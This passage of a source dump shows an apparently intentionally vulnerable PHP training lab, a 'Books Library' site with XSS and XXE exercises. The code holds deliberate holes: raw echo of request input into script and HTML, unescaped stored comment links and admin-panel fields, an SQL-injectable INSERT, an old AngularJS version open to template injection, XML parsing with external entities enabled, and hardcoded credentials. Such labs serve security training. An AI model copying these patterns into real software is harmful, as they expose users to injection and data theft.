53 | 
54 |         </form>
55 |     </center>
56 |     </div>
57 |     <script type="text/javascript">
58 |         var lang = <?php echo '"'.@$_GET['lang'].'";';?>
59 |     </script>
60 |   </body>
61 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="search.php">Search</a>
13 |         <a href="contact.php">Contact</a>
14 |         <a href="about.php#about">About</a>
15 |         <a href="profile.php">Profile</a>
16 |         <a href="login.php">Login</a>
17 |       </div>
18 |     </div>
19 |     <div>
20 |         <center>
21 |             <br><br><br><h3 id="type"></h3>
22 |         </center>
23 |     </div>
24 |     <script type="text/javascript">
25 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
26 |             i=0,
27 |             body=document.getElementById('bodyId');
28 |         body.onload = function(){
29 |             'use strict';
30 |             var typeWriter = setInterval(function(){
31 | 
32 |                 document.getElementById('type').innerHTML += msg[i];
33 |                 i = i + 1;
34 | 
35 |                 if(i>msg.length-1){
36 |                     clearInterval(typeWriter)
37 |                 }
38 |             }, 100);
39 |         }
40 |     </script>
41 |   </body>
42 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="search.php">Search</a>
24 |         <a href="contact.php">Contact</a>
25 |         <a href="about.php#about">About</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |     	<center>
32 |     	<form method="POST">
33 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
36 |     	</form>
37 |     	</center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | require("../config.php");
10 | 
11 | if( isset($_POST['link']) && isset($_POST['comment']) ){
12 |     $uname = htmlentities($_SESSION['username']);
13 |     $comment = htmlentities($_POST['comment']);
14 |     $link = "#";
15 |     // if(strpos($_POST['link'], 'http://') !== false || strpos($_POST['link'], 'https://') !== false){
16 |     $link = $_POST['link'];
17 |     // }
18 |     $sql = "INSERT INTO comments values('$uname','$comment','$link')";
19 |     $res = mysqli_query($conn, $sql);
20 | }
21 | 
22 | $sql = "SELECT * FROM comments";
23 | 
24 | $result = mysqli_query($conn, $sql);
25 | 
26 | ?>
27 | 
28 | <html>
29 |   <head>
30 |     <title>Books Library</title>
31 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
32 |   </head>
33 |   <body id="bodyId">
34 |     <div class="header">
35 |       <a href="index.php" class="logo">Books Library</a>
36 |       <div class="header-right">
37 |         <a href="index.php">Home</a>
38 |         <a href="search.php">Search</a>
39 |         <a href="contact.php">Contact</a>
40 |         <a href="about.php#about">About</a>
41 |         <a class="active" href="profile.php">Profile</a>
42 |         <a href="login.php">Login</a>
43 |       </div>
44 |     </div>
45 |     
46 |     <div class="container">
47 |     <div class="be-comment-block">
48 |         <div class="be-comment">
49 |         <?php
50 | while($rows=mysqli_fetch_array($result)){
51 |     echo '<span class="be-comment-name">';
52 |     echo '<a href="'.$rows['link'].'">'.$rows['uname'].'</a></span>';
53 |     echo '<p class="be-comment-text">'.$rows['comment'].'</p>';
54 |     echo '</div>';
55 | }
56 |         ?>
57 |         </div>
58 |         <form class="form-block" method="post">
59 |             <div class="row">
60 |                 <div class="col-xs-12">                         
61 |                     <div class="form-group">
62 |                         <textarea name="comment" class="form-input" required="" placeholder="Your text"></textarea><br>
63 |                         <input placeholder="Link" style="width: 400px;border: 1px solid #000;border-radius: 3px;" type="text" name="link" autocomplete="off">
64 |                     </div>
65 |                 </div>
66 |                 <input style="width: 100px;" type="submit" value="Comment">
67 |             </div>
68 |         </form>
69 |     </div>
70 |     </div>
71 |   </body>
72 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/search.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Application</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body>
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a href="index.php">Home</a>
12 |         <a class="active" href="search.php">Search</a>
13 |         <a href="contact.php">Contact</a>
14 |         <a href="about.php#about">About</a>
15 |         <a href="profile.php">Profile</a>
16 |         <a href="login.php">Login</a>
17 |       </div>
18 |     </div><br><br><br><br>
19 |     <center>
20 |         <form method="get">
21 |             <label>Name:</label>
22 |             <input type="text" id="name" name="u" placeholder="Enter a name here" autocomplete="off">
23 |             <input type="submit" id="search" value="search">
24 |         </form>
25 |     <div ng-app>
26 |         <p id="printOut">
27 |             <?php 
28 |             if(isset($_GET['u'])){
29 |                 echo "There is no result for: <b>".htmlspecialchars($_GET['u'])."</b>";
30 |             }
31 |             ?>
32 |         </p>
33 |     </div>
34 |     </center>
35 |   </body>
36 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xss/secret/admin_panel.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | setcookie("sessionid","21232f297a57a5a743894a0e4a801fc3",time()+3600,"../secret/");
 4 | 
 5 | require("../../config.php");
 6 | 
 7 | $sql = "SELECT * FROM contact";
 8 | 
 9 | $result = mysqli_query($conn, $sql);
10 | 
11 | ?>
12 | 
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="../index.php">Home</a>
23 |         <a href="../search.php">Search</a>
24 |         <a href="../contact.php">Contact</a>
25 |         <a href="../about.php#about">About</a>
26 |         <a href="../profile.php">Profile</a>
27 |         <a href="../login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     
31 |     <div class="container">
32 |     <div class="be-comment-block">
33 |     	<div class="be-comment">
34 |         <?php
35 |         while($rows=mysqli_fetch_array($result)){
36 |             echo '<span class="be-comment-name">';
37 |             echo '<a>'.$rows['name'].'</a>';
38 |             echo '<br><a>'.$rows['email'].'</a>';
39 |             echo '<br><input type="hidden" value="'.$rows['user_agent'].'">';
40 |             echo '</span>';
41 |             echo '<p class="be-comment-text">'.$rows['message'].'</p>';
42 |             echo '</div>';
43 |         }
44 |         ?>
45 |     </div>
46 |     </div>
47 |     </div>
48 |   </body>
49 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xxe/check.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | // libxml_disable_entity_loader(true);
 5 | 
 6 | $xm = file_get_contents("php://input");
 7 | $dom = new DOMDocument();
 8 | $dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD);
 9 | $login = simplexml_import_dom($dom);
10 | $user = $login->user;
11 | $pass = $login->pass;
12 | 
13 | if( $user == "guest" && $pass == "guest" ){
14 | 	$_SESSION['islogin'] = 1;
15 | 	$_SESSION['username'] = $user;
16 | 	header("Location: profile.php");
17 | }else{
18 | 	echo "t";
19 | }


--------------------------------------------------------------------------------
/labs_docker/src/xxe/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 5 |   </head>
 6 |   <body id="bodyId">
 7 |     <div class="header">
 8 |       <a href="index.php" class="logo">Books Library</a>
 9 |       <div class="header-right">
10 |         <a class="active" href="index.php">Home</a>
11 |         <a href="profile.php">Profile</a>
12 |         <a href="login.php">Login</a>
13 |       </div>
14 |     </div>
15 |     <div>
16 |         <center>
17 |             <br><br><br><h3 id="type"></h3>
18 |         </center>
19 |     </div>
20 |     <script type="text/javascript">
21 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
22 |             i=0,
23 |             body=document.getElementById('bodyId');
24 |         body.onload = function(){
25 |             'use strict';
26 |             var typeWriter = setInterval(function(){
27 | 
28 |                 document.getElementById('type').innerHTML += msg[i];
29 |                 i = i + 1;
30 | 
31 |                 if(i>msg.length-1){
32 |                     clearInterval(typeWriter)
33 |                 }
34 |             }, 100);
35 |         }
36 |     </script>
37 |   </body>
38 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xxe/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 5 |   if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 6 |     $_SESSION['islogin'] = 1;
 7 |     $_SESSION['username'] = $_POST['uname'];
 8 |     header("Location: profile.php");
 9 |   }else{
10 |     echo "<script>alert('Username/Password is invalid.')</script>";
11 |   }
12 | }
13 | 
14 | 
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |       <center>
32 |       <form method="POST">
33 |         <input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |         <input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |         <input type="submit" value="Login" style="background-color: dodgerblue;">
36 |       </form>
37 |       </center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/xxe/profile.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | session_start();
  4 | 
  5 | if($_SESSION['islogin'] != 1){
  6 |     header("Location: login.php");
  7 |     die();
  8 | }
  9 | 
 10 | $blind = 1;
 11 | $msg = " ";
 12 | $user = "";
 13 | $email = "";
 14 | $role ="";
 15 | $output ="";
 16 | 
 17 | if( isset( $_FILES[ 'upload' ] ) ) {
 18 | 
 19 |     $target_dir  = __DIR__ . "/files/";
 20 |     $target_file = basename( $_FILES[ 'upload' ][ 'name' ] );
 21 |     $target_ext  = substr( $target_file, strrpos( $target_file, '.' ) + 1);
 22 |     $target_path = $target_dir . $target_file;
 23 | 
 24 |     $allowed = array('xml');
 25 | 
 26 |     if( !in_array($target_ext, $allowed) ){
 27 |         
 28 |         $msg .= "Not allowd Extension, try XML file.";
 29 | 
 30 |     }else{
 31 |         if(!file_exists($target_path)){
 32 |             if( !move_uploaded_file( $_FILES[ 'upload' ][ 'tmp_name' ], $target_path ) ) {
 33 |             // No
 34 |                 $msg .= 'Your file was not accepted.';
 35 |             }
 36 |             else {
 37 |                 // Yes!
 38 |                 $msg = "";
 39 |                 // libxml_disable_entity_loader(true);
 40 |                 if( $blind == 0 ){
 41 |                 	$myfile = fopen($target_path, "r");
 42 | 	                $content = fread($myfile, filesize($target_path));
 43 | 	                $xm = $content;
 44 | 					$dom = new DOMDocument();
 45 | 					@$dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD);
 46 | 					$userInfo = @simplexml_import_dom($dom);
 47 | 					$user = @$userInfo->user;
 48 | 					$email = @$userInfo->email;
 49 | 					$role = @$userInfo->role;
 50 | 					$output = "<p>User Name: $user</p><p>Email: $email</p><p>Role: $role</p>";
 51 | 				}else{
 52 | 					$myfile = fopen($target_path, "r");
 53 | 	                $content = fread($myfile, filesize($target_path));
 54 | 	                $xm = $content;
 55 | 					$dom = new DOMDocument();
 56 | 					try{
 57 | 						@$dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD);
 58 | 					}catch (Exception $e){
 59 | 						echo "There is error in: ". $e->getMessage() . '\n';
 60 | 					}
 61 | 					$userInfo = @simplexml_import_dom($dom);
 62 | 					$output = "User Sucessfully Added.";
 63 | 				}
 64 | 				unlink($target_path);
 65 |             }
 66 |         }else{
 67 |             $msg .= "File already exists.";
 68 |         }
 69 |     }
 70 | }
 71 | ?>
 72 | 
 73 | <html>
 74 |   <head>
 75 |     <title>Books Library</title>
 76 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 77 |   </head>
 78 |   <body id="bodyId">
 79 |     <div class="header">
 80 |       <a href="index.php" class="logo">Books Library</a>
 81 |       <div class="header-right">
 82 |         <a href="index.php">Home</a>
 83 |         <a class="active" href="profile.php">Profile</a>
 84 |         <a href="login.php">Login</a>
 85 |       </div>
 86 |     </div>
 87 | 
 88 |     <div class="container">
 89 |         <form class="form-block" method="post" enctype="multipart/form-data">
 90 |             <input type="file" name="upload">
 91 |             <input type="submit" value="upload">
 92 |         </form>
 93 |         <pre>
 94 |         	<?php 
 95 |         	if($msg != "")
 96 |         		echo htmlentities($msg);
 97 |         	else{
 98 |         		echo $output;
 99 |         	}
100 |         	?>
101 |         </pre>
102 |     </div>
103 |   </body>
104 | </html>


--------------------------------------------------------------------------------